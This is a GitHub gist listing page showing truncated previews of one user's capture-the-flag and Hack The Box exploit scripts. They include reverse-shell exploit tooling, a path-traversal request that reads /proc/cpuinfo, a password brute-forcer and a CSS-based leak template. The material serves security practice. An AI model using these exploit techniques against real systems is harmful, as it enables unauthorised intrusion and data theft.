Skip to content

Instantly share code, notes, and snippets.

View xl00t's full-sized avatar

xl00t

15 followers · 73 following
View GitHub Profile
@xl00t
xl00t / Sizzle.md
Last active October 27, 2023 16:21
Sizzle - HTB
View Sizzle.md

Enumeration

- Nmap

kali@kali:/home/kali/Desktop/HTB/box/Sizzle $ nmap -p- -v -sVC -oA nmap/full 10.10.10.103
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
@xl00t
xl00t / exploit.py
Created October 23, 2023 04:56
Rusta Rhymes - Flag4All - Exploit
View exploit.py
#!/usr/bin/env python3
"""Rusta Rhymes - Flag4All - Exploit
Usage:
exploit.py <url> <revshell_ip> <revshell_port> [--handler]
Options:
-h --help Show this screen.
--handler Automaticly setup a pwncat-cs handler on defined port
@xl00t
xl00t / solve.md
Created October 22, 2023 12:39
View solve.md

Gishadb - 481

16 Solves

Ce serveur écoute sur 2 ports ! 443 et 222. Trouvez un moyen d'obtenir le flag.
This server listen on two ports: 443 and 222. Find a way to get the flag.
https://gishadb.flag4all.sh

Auteur : Penthium2 (BZHack)
@xl00t
xl00t / cracker.py
Created June 14, 2023 16:53
Stegsnow bruteforce script
View cracker.py
#!/usr/bin/env python3
import subprocess
import threading
import sys
compressed = True
def try_password(threads_i, i, password, steg_file):
try:
print(' '*74+'\r'+f"[{i}] Thread {threads_i} try password : {password}", end='\r')
@xl00t
xl00t / exploi.py
Created June 5, 2023 16:57
PikaTwoo
View exploi.py
#!/usr/bin/env python3
import sys, threading, requests
URL = f'http://pokatdex-api-v1.pokatmon-app.htb/admin/content/assets/add/hereadd'
cookie = {'SESSA0': 'a'}
# find nginx worker processes
r = requests.post(URL, data={'debug':1, 'region':'../../../../../proc/cpuinfo'}, cookies=cookie)
cpus = r.text.count('processor')
@xl00t
xl00t / exploit.py
Created June 1, 2023 08:33
FCSC 2022 | Web | Cloud Password Manager
View exploit.py
charset = string.ascii_uppercase + string.digits
template = """
@font-face{
font-family: def;
src: url(/static/fonts/Georgia.ttf);
}
@font-face{
font-family: poc;
src: url(/static/fonts/GeorgiaBold.ttf);
@xl00t
xl00t / exp.py
Last active October 24, 2023 07:36
Fomat - HTB
View exp.py
#!/usr/bin/env python3
import requests
import string
import random
import sys
from urllib3.util import SKIP_HEADER
from collections import OrderedDict
import subprocess
from threading import Thread
import socket
@xl00t
xl00t / extract_reset_password_links.py
Created May 12, 2023 14:25
Snoopy HTB - First Stage
View extract_reset_password_links.py
@xl00t
xl00t / exploit.py
Last active May 8, 2023 02:55
HTB - Noter / One Shot Exploit Script
View exploit.py
#!/usr/bin/env python3
from http.server import test, SimpleHTTPRequestHandler, HTTPServer, BaseHTTPRequestHandler
import requests
import argparse
from colorama import init as colorama_init
from colorama import Fore
from colorama import Style
import base64
import random
import string
@xl00t
xl00t / aes.rb
Created November 24, 2022 17:18
DGHACK 2022 - un chasseur sachant chasser 2
View aes.rb
require 'securerandom'
require 'openssl'
require 'base64'
require 'json'
def aes256_cbc_encrypt(key, data)
key = Digest::SHA256.digest(key) if (key.kind_of?(String) && 32 != key.bytesize)
iv = SecureRandom.random_bytes(16)
iv = Digest::MD5.digest(iv) if (iv.kind_of?(String) && 16 != iv.bytesize)